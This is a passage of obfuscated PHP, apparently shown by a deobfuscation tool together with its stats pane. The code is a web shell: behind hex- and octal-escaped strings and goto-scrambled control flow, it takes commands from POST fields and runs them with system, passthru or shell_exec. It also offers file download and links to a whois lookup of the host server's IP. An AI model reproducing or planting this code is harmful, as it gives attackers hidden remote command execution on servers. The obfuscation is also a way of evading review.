"\x3c\141\40\164\x69\164\x6c\x65\x3d\x22\x43\150\145\x63\153\40\x41\122\x49\x4e\40\x64\x61\164\141\x62\141\x73\145\40\146\157\x72\x20\x74\x68\x69\163\40\111\x50\x20\x61\x64\144\x72\x65\x73\163\40\151\156\146\157\162\x6d\x61\164\151\157\156\x2e\x22\40\164\x61\162\x67\145\x74\x3d\42\x5f\x62\x6c\x61\156\x6b\42\x20\150\162\145\146\x3d\42\x68\x74\164\x70\x3a\x2f\x2f\x77\150\x6f\151\x73\56\x61\162\151\156\x2e\156\x65\164\x2f\x72\145\x73\x74\57\x6e\145\164\163\73\161\x3d" . $_SERVER["\123\x45\122\x56\105\x52\x5f\101\104\x44\x52"] . "\77\163\x68\x6f\167\104\145\x74\x61\151\154\163\x3d\164\x72\165\x65\x26\x73\x68\157\167\101\x52\111\116\x3d\146\x61\x6c\x73\x65\x26\x73\x68\157\167\116\x6f\156\101\x72\151\156\124\157\x70\x4c\x65\x76\x65\x6c\116\x65\x74\75\x66\141\x6c\163\145\x26\x65\x78\x74\x3d\x6e\x65\x74\x72\x65\146\x32\x22\x3e" . $_SERVER["\123\x45\x52\126\105\x52\x5f\101\x44\104\x52"] . "\x3c\57\x61\x3e"; goto sOtUh; iB5q8: bscyG: goto pzUzt; S6AAl: header("\103\141\143\x68\x65\55\103\157\156\164\x72\x6f\x6c\x3a\x20\x6d\165\x73\x74\x2d\162\x65\x76\x61\154\x69\x64\x61\x74\145"); goto ZhqaP; AarRu: if (!$_POST["\x65\170\x65\x63\124\171\160\145"]) { goto yQbX8; } goto m9yYz; XtXaw: C84rx: goto Cnum_; Lmn8c: echo "\x27\51\x29\x3b\xa\11\x7d\xa\74\x2f\163\x63\162\x69\x70\x74\76\12\74\x21\x2d\x2d\x20\x44\157\x77\156\154\x6f\141\144\x20\164\x68\145\x20\x66\151\x6c\x65\x20\55\x2d\76\12"; goto AEkdA; clRxb: goto i82iw; goto H_Z0D; wy9Er: if ($_POST["\x65\170\145\143\x54\x79\160\x65"] == "\x70\141\163\x73\164\x68\162\x75") { goto xXqGT; } goto iJ5G_; bJAJD: goto i82iw; goto Q715u; Ktdz5: fw3bM: goto hCCIj; C2hO0: echo $dXr9q; goto Lmn8c; iJ5G_: if ($_POST["\145\x78\145\x63\124\x79\x70\x65"] == "\x73\150\x65\154\x6c\x5f\x65\x78\145\143") { goto xD1fF; } goto XpFkA; zVrVp: if (!($_POST["\145\170\x65\x63\x54\171\x70\x65"] == "\x73\x79\x73\164\145\155")) { goto DHsNG; } goto B9NPY; N_3_Y: if (!($_POST["\x64\x6f\x77\x6e\x6c\x6f\141\x64\x46\151\x6c\145"] == 1)) { goto LzD_v; } goto Bs0Xb; TQRS8: $jOfZ3 = preg_replace("\57\134\x28\x5b\136\x29\135\53\x5c\51\57", '', $jOfZ3); goto jQJeL; leSe2: goto n2MX8; goto EETse; V6oNr: $QnnlO = $_POST["\143\155\144"]; goto J1FPs; hCCIj: yQbX8: goto cAdxa; ZxxW_: if ($_POST["\143\x6d\144"]) { goto bscyG; } goto MEjCP; UUn8s: i82iw: goto ExDHw; CuUZ2: IybDX: goto Irmfz; lEfk5: system("{$QnnlO}\40\62\x3e\x2f\x64\145\x76\57\x73\164\x64\157\165\164", $pi11W); goto bJAJD; n03ZB: if (!$_POST["\145\x78\x65\143\x54\x79\160\x65"]) { goto IybDX; } goto zVrVp; jQJeL: echo "\11\x9\74\x74\162\x3e\74\x74\144\76\x48\157\163\x74\156\141\x6d\145\x3c\57\x74\144\x3e\x3c\164\x64\x3e"; goto JH8Pc; Q715u: xXqGT: goto biZOl; KK4ov: H1oOv: goto sfOdL; MEjCP: echo $T8ybf . "\x3c\x62\x72\40\x2f\76"; goto uibyl; x2BXK: echo $_POST["\x65\170\x65\143\124\x79\x70\x65"]; goto M_jKD; aBNcI: echo "\x3c\x2f\164\x64\x3c\x2f\164\162\x3e\12\x9\74\57\164\x61\x62\154\x65\76\xa\74\x2f\144\151\x76\76\12\x3c\57\x62\x6f\x64\171\x3e\xa\74\57\150\164\155\154\x3e\xa\123\x74\x61\164\165\x73\40\101\120\x49\40\x54\x72\141\151\x6e\x69\x6e\147\x20\123\x68\x6f\160\40\102\x6c\157\x67\x20\x41\142\x6f\165\164\40\120\x72\151\143\x69\156\147\xa\302\251\x20\62\x30\61\x35\40\107\151\164\110\x75\142\54\40\x49\x6e\143\x2e\x20\x54\145\162\x6d\x73\x20\x50\162\151\166\x61\x63\171\x20\123\x65\143\x75\162\x69\164\171\x20\103\x6f\x6e\x74\141\143\164\40\x48\145\154\160\12";

Function Calls

None

Variables

None

Stats

MD5 23fbcc55425207ff3a8c4a887ef5350b
Eval Count 0
Decode Time 100 ms